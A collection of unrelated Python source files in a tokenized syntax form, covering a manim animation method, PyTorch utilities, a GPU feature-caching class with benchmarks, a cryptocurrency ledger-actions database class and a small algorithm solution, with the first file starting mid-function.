dumb_dot=Dot(color=BLACK).shift(100<times>UR)<line_sep>intersection_wait_animation=ApplyMethod(dumb_dot.shift 0.1<times>RIGHT run_time=intersection_wait_time)<for_stmt>i,name enumerate(names_to_show)<block_start><if_stmt>name<in>self.entity_names<block_start>indices.append(self.entity_names.index(name))<if_stmt>SHOW_CN_NAMES<block_start>name_to_show=online_translation(name)<block_end><else_stmt><block_start>name_to_show=name<block_end>mid_wait_animation=ApplyMethod(dumb_dot.shift 0.1<times>RIGHT run_time=wait_time[i])<line_sep>old_lables.append(TextMobject(name_to_show color=self.COLORMAT[indices[i]]).scale(0.1))<line_sep>new_lables.append(TextMobject(name_to_show color=self.COLORMAT[indices[i]]).scale(lable_sizes[i]))<line_sep>old_lables[i].move_to(self.coordinates[indices[i] current_time_index])<line_sep>new_lables[i].next_to(self.bubbles.submobjects[indices[i]] directions[i])<line_sep>animation.append(ShowCreation(old_lables[i] run_time=0.02))<line_sep>'''
animation.append(
AnimationGroup(
ReplacementTransform(
old_lables[i],
new_lables[i],
run_time = wiggle_time[i]
),
WiggleOutThenIn(
self.bubbles.submobjects[indices[i]],
scale_value = wiggle_factor[i],
run_time = wiggle_time[i]
)
)
)
'''<line_sep>animation.append([ReplacementTransform(old_lables[i] new_lables[i] run_time=wiggle_time[i]) WiggleOutThenIn(self.bubbles.submobjects[indices[i]] scale_value=wiggle_factor[i] run_time=wiggle_time[i])])<line_sep>animation.append(mid_wait_animation)<if_stmt><not>fadeout_at_once<block_start>animation.append(FadeOut(new_lables[i] run_time=fadeout_time[i]))<block_end>animation.append(intersection_wait_animation)<block_end><block_end><if_stmt>fadeout_at_once<block_start>lables=VGroup()<for_stmt>lable new_lables<block_start>lables.add(lable)<line_sep>print(len(lables.submobjects))<block_end>animation.append(FadeOut(lables run_time=fadeout_time[0]))<block_end>print(len(animation))<line_sep><return>animation<block_end><def_stmt>Time_Update_Animation self t bubble_transform_time=BUBBLE_TRANSFROMATION_RUN_TIME time_lable_run_time=TIME_LABLE_TRANSFROMATION_RUN_TIME show_track=<false># to a specific time, t can be index(integer) within range(0,len(self.times+1))
# or t can be a element in self.times
<block_start>args=[]<line_sep>#if t is not a index, we need to convert it into index
<if_stmt><not>isinstance(t int)<block_start><if_stmt><not>t<in>self.times<block_start><raise>Exception("input argument 't' is not in self.times")<block_end><else_stmt>#if t is not a index, but is a element in self.times
<block_start>t=self.times.index(t)<block_end><block_end>#update the bubbles
new_circles=VGroup()<for_stmt>i,bubbledata enumerate(zip(self.coordinates[: t] self.radiusdata[: t]))<block_start>new_circle=Circle(radius=bubbledata[1] color=self.COLORMAT[i] fill_opacity=FILL_OPACITY).shift(bubbledata[0])<line_sep>new_circles.add(new_circle)<block_end>new_circles,self.bubbles=self.bubbles new_circles<if_stmt><not>show_track<block_start>args.append(ReplacementTransform(new_circles self.bubbles run_time=bubble_transform_time))<block_end><else_stmt><block_start>args.append(Transform(new_circles self.bubbles run_time=bubble_transform_time))<line_sep>'''
#new_circle,self.bubbles.submobjects[i] = self.bubbles.submobjects[i],new_circle
if not show_track:
args.append(
ReplacementTransform(
new_circle,
self.bubbles.submobjects[i],
run_time = bubble_transform_time
)
)
else:
args.append(
Transform(
new_circle,
self.bubbles.submobjects[i],
run_time = bubble_transform_time
)
)
'''<block_end># update the time lable:
<if_stmt>hasattr(self "time_lable")<block_start>new_time_lable=(TextMobject(str(self.times[t]) color=TIME_LABLE_COLOR).scale(TIME_LABLE_SCALE_FACTOR)).shift(TIME_LABLE_POSITION)<line_sep>new_time_lable,self.time_lable=self.time_lable new_time_lable<line_sep>args.append(ReplacementTransform(new_time_lable self.time_lable run_time=time_lable_run_time))<block_end><return>args<block_end><block_end> |
"""Various utilities."""<import_stmt>os<import_stmt>csv<import_stmt>torch<import_stmt>random<import_stmt>numpy<as>np<import_stmt>socket<import_stmt>datetime<def_stmt>system_startup args=<none> defs=<none><block_start>"""Print useful system information."""<line_sep># Choose GPU device and print status information:
device=torch.device('cuda:0')<if>torch.cuda.is_available()<else>torch.device('cpu')<line_sep>setup=dict(device=device dtype=torch.float)# non_blocking=NON_BLOCKING
print('Currently evaluating -------------------------------:')<line_sep>print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))<line_sep>print(f'CPUs: {torch.get_num_threads()}, GPUs: {torch.cuda.device_count()} on {socket.gethostname()}.')<if_stmt>args<is><not><none><block_start>print(args)<block_end><if_stmt>defs<is><not><none><block_start>print(repr(defs))<block_end><if_stmt>torch.cuda.is_available()<block_start>print(f'GPU : {torch.cuda.get_device_name(device=device)}')<block_end><return>setup<block_end><def_stmt>save_to_table out_dir name dryrun **kwargs<block_start>"""Save keys to .csv files. Function adapted from Micah."""<line_sep># Check for file
<if_stmt><not>os.path.isdir(out_dir)<block_start>os.makedirs(out_dir)<block_end>fname=os.path.join(out_dir f'table_{name}.csv')<line_sep>fieldnames=list(kwargs.keys())<line_sep># Read or write header
<try_stmt><block_start><with_stmt>open(fname 'r')<as>f<block_start>reader=csv.reader(f delimiter='\t')<line_sep>header=[line<for>line reader][0]<block_end><block_end><except_stmt>Exception<as>e<block_start>print('Creating a new .csv table...')<with_stmt>open(fname 'w')<as>f<block_start>writer=csv.DictWriter(f delimiter='\t' fieldnames=fieldnames)<line_sep>writer.writeheader()<block_end><block_end><if_stmt><not>dryrun# Add row for this experiment
<block_start><with_stmt>open(fname 'a')<as>f<block_start>writer=csv.DictWriter(f delimiter='\t' fieldnames=fieldnames)<line_sep>writer.writerow(kwargs)<block_end>print('\nResults saved to '+fname+'.')<block_end><else_stmt><block_start>print(f'Would save results to {fname}.')<line_sep>print(f'Would save these keys: {fieldnames}.')<block_end><block_end><def_stmt>set_random_seed seed=233<block_start>"""233 = 144 + 89 is my favorite number."""<line_sep>torch.manual_seed(seed+1)<line_sep>torch.cuda.manual_seed(seed+2)<line_sep>torch.cuda.manual_seed_all(seed+3)<line_sep>np.random.seed(seed+4)<line_sep>torch.cuda.manual_seed_all(seed+5)<line_sep>random.seed(seed+6)<block_end><def_stmt>set_deterministic <block_start>"""Switch pytorch into a deterministic computation mode."""<line_sep>torch.backends.cudnn.deterministic=<true><line_sep>torch.backends.cudnn.benchmark=<false><block_end> |
<import_stmt>torch<import_stmt>torch_quiver<as>torch_qv<import_stmt>random<import_stmt>numpy<as>np<import_stmt>time<import_from_stmt>typing List<import_from_stmt>quiver.shard_tensor ShardTensor ShardTensorConfig Topo<import_from_stmt>quiver.utils reindex_feature<import_stmt>torch.multiprocessing<as>mp<import_from_stmt>torch.multiprocessing Process<import_stmt>os<import_stmt>sys<import_stmt>quiver<import_stmt>torch.distributed<as>dist<import_stmt>torch<import_stmt>torch_quiver<as>torch_qv<import_stmt>random<import_stmt>numpy<as>np<import_stmt>time<import_from_stmt>typing List<import_from_stmt>quiver.shard_tensor ShardTensor ShardTensorConfig Topo<import_from_stmt>quiver.utils reindex_feature<line_sep>__all__=["Feature"]<class_stmt>Feature<block_start><def_stmt>__init__ self rank device_list device_cache_size=0 cache_policy='device_replicate' csr_topo=<none><block_start>self.device_cache_size=device_cache_size<line_sep>self.cache_policy=cache_policy<line_sep>self.device_list=device_list<line_sep>self.device_tensor_list={}<line_sep>self.numa_tensor_list={}<line_sep>self.rank=rank<line_sep>self.topo=Topo(self.device_list)<line_sep>self.csr_topo=csr_topo<line_sep>self.ipc_handle_=<none><block_end><def_stmt>cal_memory_budget_bytes self memory_budget<block_start><if_stmt>isinstance(memory_budget int)<block_start><return>memory_budget<block_end><elif_stmt>isinstance(memory_budget float)<block_start>memory_budget=int(memory_budget)<block_end><elif_stmt>isinstance(memory_budget str)<block_start><if_stmt>memory_budget.upper().endswith("M")<or>memory_budget.upper().endswith("MB")<block_start>end=-1<if>memory_budget.upper().endswith("M")<else>-2<line_sep>memory_budget=int(float(memory_budget[:end])<times>1024<times>1024)<block_end><elif_stmt>memory_budget.upper().endswith("G")<or>memory_budget.upper().endswith("GB")<block_start>end=-1<if>memory_budget.upper().endswith("G")<else>-2<line_sep>memory_budget=int(float(memory_budget[:end])<times>1024<times>1024<times>1024)<block_end><block_end><else_stmt><block_start><raise>Exception("memory budget input is not valid")<block_end><return>memory_budget<block_end><def_stmt>cal_size self cpu_tensor cache_memory_budget<block_start>element_size=cpu_tensor.shape[1]<times>4<line_sep>cache_size=cache_memory_budget<floordiv>element_size<line_sep><return>cache_size<block_end><def_stmt>partition self cpu_tensor cache_memory_budget<block_start>cache_size=self.cal_size(cpu_tensor cache_memory_budget)<line_sep><return>[cpu_tensor[:cache_size] cpu_tensor[cache_size:]]<block_end><def_stmt>from_cpu_tensor self cpu_tensor<block_start><if_stmt>self.cache_policy<eq>"device_replicate"<block_start>cache_memory_budget=self.cal_memory_budget_bytes(self.device_cache_size)<line_sep>shuffle_ratio=0.0<block_end><else_stmt><block_start>cache_memory_budget=self.cal_memory_budget_bytes(self.device_cache_size)<times>len(self.topo.Numa2Device[0])<line_sep>shuffle_ratio=self.cal_size(cpu_tensor cache_memory_budget)/cpu_tensor.size(0)<block_end>print(f"LOG>>> {min(100 int(100<times>cache_memory_budget/cpu_tensor.numel()/4))}% data cached")<if_stmt>self.csr_topo<is><not><none><block_start>print("Create")<line_sep>cpu_tensor,self.csr_topo.feature_order=reindex_feature(self.csr_topo cpu_tensor shuffle_ratio)<line_sep>self.feature_order=self.csr_topo.feature_order.to(self.rank)<line_sep>print("Done Create")<block_end>cache_part,self.cpu_part=self.partition(cpu_tensor cache_memory_budget)<line_sep>self.cpu_part=self.cpu_part.clone()<if_stmt>cache_part.shape[0]<g>0<and>self.cache_policy<eq>"device_replicate"<block_start><for_stmt>device self.device_list<block_start>shard_tensor=ShardTensor(self.rank ShardTensorConfig({}))<line_sep>shard_tensor.append(cache_part device)<line_sep>self.device_tensor_list[device]=shard_tensor<block_end><block_end><elif_stmt>cache_part.shape[0]<g>0<block_start>numa0_device_list=self.topo.Numa2Device[0]<line_sep>numa1_device_list=self.topo.Numa2Device[1]<line_sep>block_size=self.cal_size(cpu_tensor cache_memory_budget<floordiv>len(self.topo.Numa2Device[0]))<if_stmt>len(numa0_device_list)<g>0<block_start>print(f"LOG>>> GPU {numa0_device_list} belong to the same NUMA Domain")<line_sep>shard_tensor=ShardTensor(self.rank ShardTensorConfig({}))<line_sep>cur_pos=0<for_stmt>idx,device enumerate(numa0_device_list)<block_start><if_stmt>idx<eq>len(numa0_device_list)-1<block_start>shard_tensor.append(cache_part[cur_pos:] device)<block_end><else_stmt><block_start>shard_tensor.append(cache_part[cur_pos:cur_pos+block_size] device)<line_sep>cur_pos<augadd>block_size<block_end><block_end>self.numa_tensor_list[0]=shard_tensor<block_end><if_stmt>len(numa1_device_list)<g>0<block_start>print(f"LOG>>> GPU {numa1_device_list} belong to the same NUMA Domain")<line_sep>shard_tensor=ShardTensor(self.rank ShardTensorConfig({}))<line_sep>cur_pos=0<for_stmt>idx,device enumerate(numa1_device_list)<block_start><if_stmt>idx<eq>len(numa1_device_list)-1<block_start>shard_tensor.append(cache_part[cur_pos:] device)<block_end><else_stmt><block_start>shard_tensor.append(cache_part[cur_pos:cur_pos+block_size] device)<line_sep>cur_pos<augadd>block_size<block_end><block_end>self.numa_tensor_list[1]=shard_tensor<block_end><block_end># ๆๅปบCPU Tensor
<if_stmt>self.cpu_part.numel()<g>0<block_start><if_stmt>self.cache_policy<eq>"device_replicate"<block_start>shard_tensor=self.device_tensor_list.get(self.rank <none>)<or>ShardTensor(self.rank ShardTensorConfig({}))<line_sep>shard_tensor.append(self.cpu_part -1)<line_sep>self.device_tensor_list[self.rank]=shard_tensor<block_end><else_stmt><block_start>numa_id=self.topo.get_numa_node(self.rank)<line_sep>shard_tensor=self.numa_tensor_list.get(numa_id <none>)<or>ShardTensor(self.rank ShardTensorConfig({}))<line_sep>shard_tensor.append(self.cpu_part -1)<line_sep>self.numa_tensor_list[numa_id]=shard_tensor<block_end><block_end><block_end><def_stmt>__getitem__ self node_idx<block_start>self.lazy_init_from_ipc_handle()<line_sep>node_idx=node_idx.to(self.rank)<if_stmt>self.feature_order<is><not><none><block_start>node_idx=self.feature_order[node_idx]<block_end><if_stmt>self.cache_policy<eq>"device_replicate"<block_start>shard_tensor=self.device_tensor_list[self.rank]<line_sep><return>shard_tensor[node_idx]<block_end><else_stmt><block_start>numa_id=self.topo.get_numa_node(self.rank)<line_sep>shard_tensor=self.numa_tensor_list[numa_id]<line_sep><return>shard_tensor[node_idx]<block_end><block_end><def_stmt>size self dim<block_start>self.lazy_init_from_ipc_handle()<if_stmt>self.cache_policy<eq>"device_replicate"<block_start>shard_tensor=self.device_tensor_list[self.rank]<line_sep><return>shard_tensor.size(dim)<block_end><else_stmt><block_start>numa_id=self.topo.get_numa_node(self.rank)<line_sep>shard_tensor=self.numa_tensor_list[numa_id]<line_sep><return>shard_tensor.size(dim)<block_end><block_end>@property<def_stmt>shape self<block_start>self.lazy_init_from_ipc_handle()<if_stmt>self.cache_policy<eq>"device_replicate"<block_start>shard_tensor=self.device_tensor_list[self.rank]<line_sep><return>shard_tensor.shape<block_end><else_stmt><block_start>numa_id=self.topo.get_numa_node(self.rank)<line_sep>shard_tensor=self.numa_tensor_list[numa_id]<line_sep><return>shard_tensor.shape<block_end><block_end>@property<def_stmt>ipc_handle self<block_start><return>self.ipc_handle_<block_end>@ipc_handle.setter<def_stmt>ipc_handle self ipc_handle<block_start>self.ipc_handle_=ipc_handle<block_end><def_stmt>share_ipc self<block_start>gpu_ipc_handle_dict={}<if_stmt>self.cache_policy<eq>"device_replicate"<block_start><for_stmt>device self.device_tensor_list<block_start>gpu_ipc_handle_dict[device]=self.device_tensor_list[device].share_ipc()[0]<block_end><block_end><else_stmt><block_start><for_stmt>numa_node self.numa_tensor_list<block_start>gpu_ipc_handle_dict[numa_node]=self.numa_tensor_list[numa_node].share_ipc()[0]<block_end><block_end><return>gpu_ipc_handle_dict self.cpu_part self.device_list self.device_cache_size self.cache_policy self.csr_topo<block_end><def_stmt>from_gpu_ipc_handle_dict self gpu_ipc_handle_dict cpu_tensor<block_start><if_stmt>self.cache_policy<eq>"device_replicate"<block_start>ipc_handle=gpu_ipc_handle_dict.get(self.rank []) cpu_tensor ShardTensorConfig({})<line_sep>shard_tensor=ShardTensor.new_from_share_ipc(ipc_handle self.rank)<line_sep>self.device_tensor_list[self.rank]=shard_tensor<block_end><else_stmt><block_start>numa_node=self.topo.get_numa_node(self.rank)<line_sep>ipc_handle=gpu_ipc_handle_dict.get(numa_node []) cpu_tensor ShardTensorConfig({})<line_sep>shard_tensor=ShardTensor.new_from_share_ipc(ipc_handle self.rank)<line_sep>self.numa_tensor_list[numa_node]=shard_tensor<block_end>self.cpu_part=cpu_tensor<block_end>@classmethod<def_stmt>new_from_ipc_handle cls rank ipc_handle<block_start>gpu_ipc_handle_dict,cpu_part,device_list,device_cache_size,cache_policy,csr_topo=ipc_handle<line_sep>feature=cls(rank device_list device_cache_size cache_policy)<line_sep>feature.from_gpu_ipc_handle_dict(gpu_ipc_handle_dict cpu_part)<if_stmt>csr_topo<is><not><none><block_start>feature.feature_order=csr_topo.feature_order.to(rank)<block_end>self.csr_topo=csr_topo<line_sep><return>feature<block_end>@classmethod<def_stmt>lazy_from_ipc_handle cls ipc_handle<block_start>gpu_ipc_handle_dict,cpu_part,device_list,device_cache_size,cache_policy,_=ipc_handle<line_sep>feature=cls(device_list[0] device_list device_cache_size cache_policy)<line_sep>feature.ipc_handle=ipc_handle<line_sep><return>feature<block_end><def_stmt>lazy_init_from_ipc_handle self<block_start><if_stmt>self.ipc_handle<is><none><block_start><return><block_end>self.rank=torch.cuda.current_device()<line_sep>gpu_ipc_handle_dict,cpu_part,device_list,device_cache_size,cache_policy,csr_topo=self.ipc_handle<line_sep>self.from_gpu_ipc_handle_dict(gpu_ipc_handle_dict cpu_part)<line_sep>self.csr_topo=csr_topo<if_stmt>csr_topo<is><not><none><block_start>self.feature_order=csr_topo.feature_order.to(self.rank)<block_end>self.ipc_handle=<none><block_end><block_end><import_from_stmt>multiprocessing.reduction ForkingPickler<def_stmt>rebuild_feature ipc_handle<block_start>print("check rebuild")<line_sep>feature=Feature.lazy_from_ipc_handle(ipc_handle)<line_sep><return>feature<block_end><def_stmt>reduce_feature feature<block_start>ipc_handle=feature.share_ipc()<line_sep><return>(rebuild_feature (ipc_handle ))<block_end><def_stmt>rebuild_pyg_sampler cls ipc_handle<block_start>sampler=cls.lazy_from_ipc_handle(ipc_handle)<line_sep><return>sampler<block_end><def_stmt>reduce_pyg_sampler sampler<block_start>ipc_handle=sampler.share_ipc()<line_sep><return>(rebuild_pyg_sampler (type(sampler) ipc_handle ))<block_end><def_stmt>init_reductions <block_start>ForkingPickler.register(Feature reduce_feature)<block_end><def_stmt>test_feature_basic <block_start>rank=0<line_sep>NUM_ELEMENT=1000000<line_sep>SAMPLE_SIZE=80000<line_sep>FEATURE_DIM=600<line_sep>#########################
# Init With Numpy
########################
torch.cuda.set_device(rank)<line_sep>host_tensor=np.random.randint(0 high=10 size=(2<times>NUM_ELEMENT FEATURE_DIM))<line_sep>tensor=torch.from_numpy(host_tensor).type(torch.float32)<line_sep>host_indice=np.random.randint(0 2<times>NUM_ELEMENT-1 (SAMPLE_SIZE ))<line_sep>indices=torch.from_numpy(host_indice).type(torch.long)<line_sep>print("host data size" host_tensor.size<times>4<floordiv>1024<floordiv>1024 "MB")<line_sep>device_indices=indices.to(rank)<line_sep>############################
# define a quiver.Feature
###########################
feature=quiver.Feature(rank=rank device_list=[0 1 2 3] device_cache_size="0.9G" cache_policy="numa_replicate")<line_sep>feature.from_cpu_tensor(tensor)<line_sep>####################
# Indexing
####################
res=feature[device_indices]<line_sep>start=time.time()<line_sep>res=feature[device_indices]<line_sep>consumed_time=time.time()-start<line_sep>res=res.cpu().numpy()<line_sep>feature_gt=tensor[indices].numpy()<line_sep>print("Correctness Check : " np.array_equal(res feature_gt))<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {res.size<times>4/consumed_time/1024/1024/1024} GB/s, consumed {consumed_time}s")<block_end><def_stmt>child_proc rank world_size host_tensor feature<block_start>torch.cuda.set_device(rank)<line_sep>print(f"Process {os.getpid()}: check current device {torch.cuda.current_device()}")<line_sep>NUM_ELEMENT=host_tensor.shape[0]<line_sep>SAMPLE_SIZE=80000<line_sep>device_tensor=host_tensor.to(rank)<line_sep>bandwidth=[]<for_stmt>_ range(30)<block_start>device_indices=torch.randint(0 NUM_ELEMENT-1 (SAMPLE_SIZE ) device=rank)<line_sep>torch.cuda.synchronize()<line_sep>start=time.time()<line_sep>res=feature[device_indices]<line_sep>consumed_time=time.time()-start<line_sep>bandwidth.append(res.numel()<times>4/consumed_time/1024/1024/1024)<assert_stmt>torch.equal(res device_tensor[device_indices])<block_end>print("Correctness check passed")<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {np.mean(np.array(bandwidth[1:]))} GB/s, consumed {consumed_time}s, res size {res.numel()<times>4/1024/1024/1024}GB")<block_end><def_stmt>test_ipc <block_start>rank=0<line_sep>NUM_ELEMENT=1000000<line_sep>FEATURE_DIM=600<line_sep>#########################
# Init With Numpy
########################
torch.cuda.set_device(rank)<line_sep>host_tensor=np.random.randint(0 high=10 size=(2<times>NUM_ELEMENT FEATURE_DIM))<line_sep>tensor=torch.from_numpy(host_tensor).type(torch.float32)<line_sep>print("host data size" host_tensor.size<times>4<floordiv>1024<floordiv>1024 "MB")<line_sep>############################
# define a quiver.Feature
###########################
feature=quiver.Feature(rank=rank device_list=[0 1] device_cache_size=0 cache_policy="numa_replicate")<line_sep>feature.from_cpu_tensor(tensor)<line_sep>world_size=2<line_sep>mp.spawn(child_proc args=(world_size tensor feature) nprocs=world_size join=<true>)<block_end><def_stmt>child_proc_real_data rank feature host_tensor<block_start>NUM_ELEMENT=2000000<line_sep>SAMPLE_SIZE=800000<line_sep>bandwidth=[]<line_sep>torch.cuda.set_device(rank)<line_sep>device_tensor=host_tensor.to(rank)<for_stmt>_ range(300)<block_start>device_indices=torch.randint(0 NUM_ELEMENT-1 (SAMPLE_SIZE ) device=rank)<line_sep>torch.cuda.synchronize()<line_sep>start=time.time()<line_sep>res=feature[device_indices]<line_sep>consumed_time=time.time()-start<line_sep>bandwidth.append(res.numel()<times>4/consumed_time/1024/1024/1024)<assert_stmt>torch.equal(device_tensor[device_indices] res)<block_end>print("Correctness check passed")<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {np.mean(np.array(bandwidth[1:]))} GB/s, consumed {consumed_time}s, res size {res.numel()<times>4/1024/1024/1024}GB")<block_end><def_stmt>test_ipc_with_real_data <block_start><import_from_stmt>ogb.nodeproppred PygNodePropPredDataset<line_sep>root="/data/data/products"<line_sep>dataset=PygNodePropPredDataset('ogbn-products' root)<line_sep>data=dataset[0]<line_sep>world_size=torch.cuda.device_count()<line_sep>##############################
# Create Sampler And Feature
##############################
csr_topo=quiver.CSRTopo(data.edge_index)<line_sep>feature=torch.zeros(data.x.shape)<line_sep>feature[:]=data.x<line_sep>quiver_feature=Feature(rank=0 device_list=list(range(world_size)) device_cache_size="200M" cache_policy="device_replicate" csr_topo=csr_topo)<line_sep>quiver_feature.from_cpu_tensor(feature)<line_sep>print('Let\'s use' world_size 'GPUs!')<line_sep>mp.spawn(child_proc_real_data args=(quiver_feature feature) nprocs=world_size join=<true>)<block_end><def_stmt>normal_test <block_start>rank=0<line_sep>NUM_ELEMENT=1000000<line_sep>FEATURE_DIM=600<line_sep>SAMPLE_SIZE=80000<line_sep>#########################
# Init With Numpy
########################
torch.cuda.set_device(rank)<line_sep>host_tensor=np.random.randint(0 high=10 size=(2<times>NUM_ELEMENT FEATURE_DIM))<line_sep>tensor=torch.from_numpy(host_tensor).type(torch.float32)<line_sep>host_indice=np.random.randint(0 2<times>NUM_ELEMENT-1 (SAMPLE_SIZE ))<line_sep>indices=torch.from_numpy(host_indice).type(torch.long)<line_sep>tensor.to(rank)<line_sep>torch.cuda.synchronize()<line_sep>start=time.time()<line_sep>feature=tensor[indices]<line_sep>feature=feature.to(rank)<line_sep>torch.cuda.synchronize()<line_sep>consumed_time=time.time()-start<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {feature.numel()<times>4/consumed_time/1024/1024/1024} GB/s, consumed {consumed_time}s")<block_end><def_stmt>test_paper100M <block_start>dataset=torch.load("/data/papers/ogbn_papers100M/quiver_preprocess/paper100M.pth")<line_sep>csr_topo=dataset["csr_topo"]<line_sep>feature=dataset["sorted_feature"]<line_sep>NUM_ELEMENT=feature.shape[0]<line_sep>SAMPLE_SIZE=80000<line_sep>world_size=4<line_sep>rank=0<line_sep>dataset["label"]=torch.from_numpy(dataset["label"])<line_sep>dataset["num_features"]=feature.shape[1]<line_sep>dataset["num_classes"]=172<line_sep>quiver_sampler=quiver.pyg.GraphSageSampler(csr_topo [15 10 5] 0 mode="UVA")<line_sep>quiver_feature=quiver.Feature(rank=0 device_list=list(range(world_size)) device_cache_size="12G" cache_policy="numa_replicate")<line_sep>quiver_feature.from_cpu_tensor(feature)<line_sep>device_indices=torch.randint(0 NUM_ELEMENT-1 (SAMPLE_SIZE ) device=rank)<line_sep>res=quiver_feature[device_indices]<line_sep>start=time.time()<line_sep>res=quiver_feature[device_indices]<line_sep>consumed_time=time.time()-start<line_sep>print(f"Process {os.getpid()}: TEST SUCCEED!, With Memory Bandwidth = {res.numel()<times>4/consumed_time/1024/1024/1024} GB/s, consumed {consumed_time}s")<block_end><if_stmt>__name__<eq>"__main__"<block_start>mp.set_start_method("spawn")<line_sep>torch_qv.init_p2p([0 1 2 3])<line_sep>test_paper100M()<line_sep>#init_reductions()
#test_feature_basic()
#test_ipc()
#normal_test()
#test_ipc_with_real_data()
<block_end> |
<import_stmt>logging<import_from_stmt>typing TYPE_CHECKING List Optional Tuple<import_from_stmt>pysqlcipher3 dbapi2<as>sqlcipher<import_from_stmt>rotkehlchen.accounting.ledger_actions LedgerAction<import_from_stmt>rotkehlchen.constants.limits FREE_LEDGER_ACTIONS_LIMIT<import_from_stmt>rotkehlchen.db.filtering LedgerActionsFilterQuery<import_from_stmt>rotkehlchen.errors.asset UnknownAsset<import_from_stmt>rotkehlchen.errors.serialization DeserializationError<import_from_stmt>rotkehlchen.logging RotkehlchenLogsAdapter<import_from_stmt>rotkehlchen.user_messages MessagesAggregator<line_sep>logger=logging.getLogger(__name__)<line_sep>log=RotkehlchenLogsAdapter(logger)<if_stmt>TYPE_CHECKING<block_start><import_from_stmt>rotkehlchen.db.dbhandler DBHandler<block_end><class_stmt>DBLedgerActions()<block_start><def_stmt>__init__ self database:'DBHandler' msg_aggregator:MessagesAggregator<block_start>self.db=database<line_sep>self.msg_aggregator=msg_aggregator<block_end><def_stmt>get_ledger_actions_and_limit_info self filter_query:LedgerActionsFilterQuery has_premium:bool <arrow>Tuple[List[LedgerAction] int]<block_start>"""Gets all ledger actions for the query from the DB
Also returns how many are the total found for the filter
"""<line_sep>actions=self.get_ledger_actions(filter_query=filter_query has_premium=has_premium)<line_sep>cursor=self.db.conn.cursor()<line_sep>query,bindings=filter_query.prepare(with_pagination=<false>)<line_sep>query='SELECT COUNT(*) from ledger_actions '+query<line_sep>total_found_result=cursor.execute(query bindings)<line_sep><return>actions total_found_result.fetchone()[0]<block_end><def_stmt>get_ledger_actions self filter_query:LedgerActionsFilterQuery has_premium:bool <arrow>List[LedgerAction]<block_start>"""Returns a list of ledger actions optionally filtered by the given filter.
Returned list is ordered according to the passed filter query
"""<line_sep>cursor=self.db.conn.cursor()<line_sep>query_filter,bindings=filter_query.prepare()<if_stmt>has_premium<block_start>query='SELECT * from ledger_actions '+query_filter<line_sep>results=cursor.execute(query bindings)<block_end><else_stmt><block_start>query='SELECT * FROM (SELECT * from ledger_actions ORDER BY timestamp DESC LIMIT ?) '+query_filter# noqa: E501
results=cursor.execute(query [FREE_LEDGER_ACTIONS_LIMIT]+bindings)<block_end>actions=[]<for_stmt>result results<block_start><try_stmt><block_start>action=LedgerAction.deserialize_from_db(result)<block_end><except_stmt>DeserializationError<as>e<block_start>self.msg_aggregator.add_error(f'Error deserializing Ledger Action from the DB. Skipping it.'<concat>f'Error was: {str(e)}' )<line_sep><continue><block_end><except_stmt>UnknownAsset<as>e<block_start>self.msg_aggregator.add_error(f'Error deserializing Ledger Action from the DB. Skipping it. '<concat>f'Unknown asset {e.asset_name} found' )<line_sep><continue><block_end>actions.append(action)<block_end><return>actions<block_end><def_stmt>add_ledger_action self action:LedgerAction<arrow>int<block_start>"""Adds a new ledger action to the DB and returns its identifier for success
May raise:
- sqlcipher.IntegrityError if there is a conflict at addition in _add_gitcoin_extra_data.
If this error is raised connection needs to be rolled back by the caller.
"""<line_sep>cursor=self.db.conn.cursor()<line_sep>query="""
INSERT INTO ledger_actions(
timestamp, type, location, amount, asset, rate, rate_asset, link, notes
)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);"""<line_sep>cursor.execute(query action.serialize_for_db())<line_sep>identifier=cursor.lastrowid<line_sep>action.identifier=identifier<line_sep>self.db.conn.commit()<line_sep><return>identifier<block_end><def_stmt>add_ledger_actions self actions:List[LedgerAction]<arrow><none><block_start>"""Adds multiple ledger action to the DB
Is slow due to not using executemany since the ledger actions table
utilized an auto generated primary key.
"""<for_stmt>action actions<block_start><try_stmt><block_start>self.add_ledger_action(action)<block_end><except_stmt>sqlcipher.IntegrityError# pylint: disable=no-member
<block_start>self.db.msg_aggregator.add_warning('Did not add ledger action to DB due to it already existing')# noqa: E501
log.warning(f'Did not add ledger action {action} to the DB due to it already existing')# noqa: E501
self.db.conn.rollback()<block_end><block_end><block_end># undo the addition and rollack to last commit
<def_stmt>remove_ledger_action self identifier:int<arrow>Optional[str]<block_start>"""Removes a ledger action from the DB by identifier
Returns None for success or an error message for error
"""<line_sep>error_msg=<none><line_sep>cursor=self.db.conn.cursor()<line_sep>cursor.execute('DELETE from ledger_actions WHERE identifier = ?;' (identifier ) )<if_stmt>cursor.rowcount<l>1<block_start>error_msg=(f'Tried to delete ledger action with identifier {identifier} but '<concat>f'it was not found in the DB')<block_end>self.db.conn.commit()<line_sep><return>error_msg<block_end><def_stmt>edit_ledger_action self action:LedgerAction<arrow>Optional[str]<block_start>"""Edits a ledger action from the DB by identifier
Does not edit the extra data at the moment
Returns None for success or an error message for error
"""<line_sep>error_msg=<none><line_sep>cursor=self.db.conn.cursor()<line_sep>query="""
UPDATE ledger_actions SET timestamp=?, type=?, location=?, amount=?,
asset=?, rate=?, rate_asset=?, link=?, notes=? WHERE identifier=?"""<line_sep>db_action_tuple=action.serialize_for_db()<line_sep>cursor.execute(query (*db_action_tuple action.identifier))<if_stmt>cursor.rowcount<ne>1<block_start>error_msg=(f'Tried to edit ledger action with identifier {action.identifier} '<concat>f'but it was not found in the DB')<block_end>self.db.conn.commit()<line_sep><return>error_msg<block_end><block_end> |
<import_stmt>foundations<import_from_stmt>integration.test_consumers TestConsumers<line_sep> |
# https://judge.kimiyuki.net/problem/sum-sum-plus-one-lt
<import_from_stmt>typing *<def_stmt>solve a:List[int]<arrow>int<block_start>n=len(a)<line_sep>ans=0<for_stmt>i range(n)<block_start><for_stmt>j range(i+1 n)<block_start>ans<augadd>a[i]-a[j]<block_end><block_end><return>ans<block_end><def_stmt>main <arrow><none><block_start>n=int(input())<line_sep>a=list(map(int input().split()))<assert_stmt>len(a)<eq>n<line_sep>ans=solve(a)<line_sep>print(ans)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end> |
